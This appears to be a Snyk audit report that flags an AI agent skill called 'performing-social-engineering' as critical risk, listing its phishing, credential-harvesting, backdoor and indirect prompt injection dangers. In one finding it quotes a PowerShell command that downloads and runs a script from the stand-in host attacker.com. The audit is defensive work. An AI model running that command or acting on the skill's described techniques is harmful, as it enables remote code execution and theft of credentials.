NYC

performing-social-engineering

Fail

Audited by Snyk on Feb 16, 2026

Risk Level: CRITICAL

Full Analysis

CRITICAL E005: Suspicious download URL detected in skill instructions.

  • Suspicious download URL detected (high risk: 0.95). The set includes multiple attacker-controlled/ambiguous domains and direct links to executables/scripts (e.g., .exe, .ps1, remote hook.js), credential-harvesting endpoints and tracking pixels alongside a few legitimate references, indicating a high likelihood these URLs can be used to distribute malware or perform malicious actions.

CRITICAL E006: Malicious code pattern detected in skill scripts.

  • Malicious code pattern detected (high risk: 1.00). This content provides explicit, actionable instructions and scripts for phishing, credential harvesting, remote payload execution, backdoors, and opsec techniques that enable data exfiltration and system compromise if misused.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

  • Third-party content exposure detected (high risk: 1.00). The skill explicitly instructs fetching and scraping public websites and social media (e.g., "Clone Legitimate Sites" with httrack/wget/curl to download http://legitimate-site.com and the "LinkedIn/Social Media Reconnaissance" section for gathering employee info), so the agent would ingest untrusted, user-generated third‑party content that could enable indirect prompt injection.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

  • Potentially malicious external URL detected (high risk: 1.00). The skill includes runtime commands that directly fetch and execute remote code—for example PowerShell IEX((new-object net.webclient).downloadstring('http://attacker.com/payload.ps1'))—so the URL http://attacker.com/payload.ps1 is used at runtime to execute remote code and is a required dependency for the demonstrated payloads.

Audit Metadata

Risk Level: CRITICAL
Analyzed: Feb 16, 2026, 02:49 AM